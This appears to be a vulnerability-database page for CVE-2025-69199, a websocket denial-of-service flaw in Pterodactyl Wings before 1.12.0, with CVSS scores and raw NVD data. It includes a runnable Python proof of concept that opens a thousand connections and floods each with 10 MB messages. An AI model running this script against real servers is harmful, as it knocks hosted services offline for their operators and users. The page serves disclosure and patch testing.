Security Vulnerability Report
CVE-2025-69199 CVSS 6.5 MEDIUM

CVE-2025-69199

Published: 2026-01-19 20:15:48
Last Modified: 2026-02-02 20:41:14

Description

Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to version 1.12.0, websockets within Wings lack proper rate limiting and throttling. As a result, a malicious user can open a large number of connections and then request data through these sockets, causing an excessive volume of data over the network and overloading the host system's memory and CPU. Additionally, no limit is applied to the total size of messages being sent or received, allowing a malicious user to open thousands of websocket connections and then send massive volumes of data over the socket, overloading the host network and increasing CPU and memory load within Wings. Version 1.12.0 patches the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:pterodactyl:wings:*:*:*:*:*:*:*:* - VULNERABLE
Pterodactyl Wings < 1.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-69199 PoC - Pterodactyl Wings WebSocket DoS
Note: This PoC is for educational and authorized testing purposes only.
"""
import argparse
import asyncio
import json

import websockets


async def exploit(target_url, num_connections, message_size):
    """
    Simulate the DoS attack by creating many websocket connections
    and sending large messages to exhaust server resources.
    """
    print(f"[*] Starting CVE-2025-69199 exploit against {target_url}")
    print(f"[*] Target: {num_connections} connections, {message_size} bytes per message")

    large_message = "A" * message_size

    async def create_websocket_session(uri):
        """Create a websocket connection and send large messages."""
        try:
            async with websockets.connect(uri, ping_interval=None) as ws:
                # Send authentication (if required)
                auth_data = {"event": "auth", "data": {"token": "test_token"}}
                await ws.send(json.dumps(auth_data))
                # Continuously send large messages
                while True:
                    await ws.send(large_message)
                    await asyncio.sleep(0.1)  # Small delay between messages
        except Exception as e:
            print(f"[-] Connection error: {e}")

    # Create multiple websocket connections
    tasks = []
    for i in range(num_connections):
        task = asyncio.create_task(create_websocket_session(target_url))
        tasks.append(task)
        print(f"[*] Created connection {i + 1}/{num_connections}")
        await asyncio.sleep(0.01)  # Stagger connection creation

    print(f"[*] All {num_connections} connections established")
    print("[*] Attack in progress... Press Ctrl+C to stop")
    try:
        await asyncio.gather(*tasks)
    finally:
        # Cancel any still-running sessions on shutdown
        for task in tasks:
            task.cancel()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-69199 PoC")
    parser.add_argument("--target", default="ws://localhost:8080/ws", help="Target websocket URL")
    parser.add_argument("--connections", type=int, default=1000, help="Number of connections")
    parser.add_argument("--message-size", type=int, default=10485760,
                        help="Message size in bytes (default: 10MB)")
    args = parser.parse_args()
    try:
        asyncio.run(exploit(args.target, args.connections, args.message_size))
    except KeyboardInterrupt:
        # Ctrl+C surfaces here, outside the event loop, once asyncio.run() has torn down the tasks
        print("\n[!] Attack stopped by user")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69199", "sourceIdentifier": "[email protected]", "published": "2026-01-19T20:15:48.370", "lastModified": "2026-02-02T20:41:13.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to version 1.12.0, websockets within wings lack proper rate limiting and throttling. As a result a malicious user can open a large number of connections and then request data through these sockets, causing an excessive volume of data over the network and overloading the host system memory and cpu. Additionally, there is not a limit applied to the total size of messages being sent or received, allowing a malicious user to open thousands of websocket connections and then send massive volumes of information over the socket, overloading the host network, and causing increased CPU and memory load within Wings. Version 1.12.0 patches the issue."}, {"lang": "es", "value": "Wings es el plano de control del servidor para Pterodactyl, un panel de gestión de servidores de juegos gratuito y de código abierto. Antes de la versión 1.12.0, los websockets dentro de Wings carecen de una adecuada limitación de velocidad y estrangulamiento. Como resultado, un usuario malintencionado puede abrir un gran número de conexiones y luego solicitar datos a través de estos sockets, causando un volumen excesivo de datos en la red y sobrecargando la memoria y la CPU del sistema anfitrión. Además, no se aplica un límite al tamaño total de los mensajes enviados o recibidos, lo que permite a un usuario malintencionado abrir miles de conexiones websocket y luego enviar volúmenes masivos de información a través del socket, sobrecargando la red del anfitrión y causando una mayor carga de CPU y memoria dentro de Wings. La versión 1.12.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pterodactyl:wings:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.0", "matchCriteriaId": "D0892774-9788-48C8-A188-A1A6373735F0"}]}]}], "references": [{"url": "https://github.com/pterodactyl/panel/security/advisories/GHSA-8w7m-w749-rx98", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}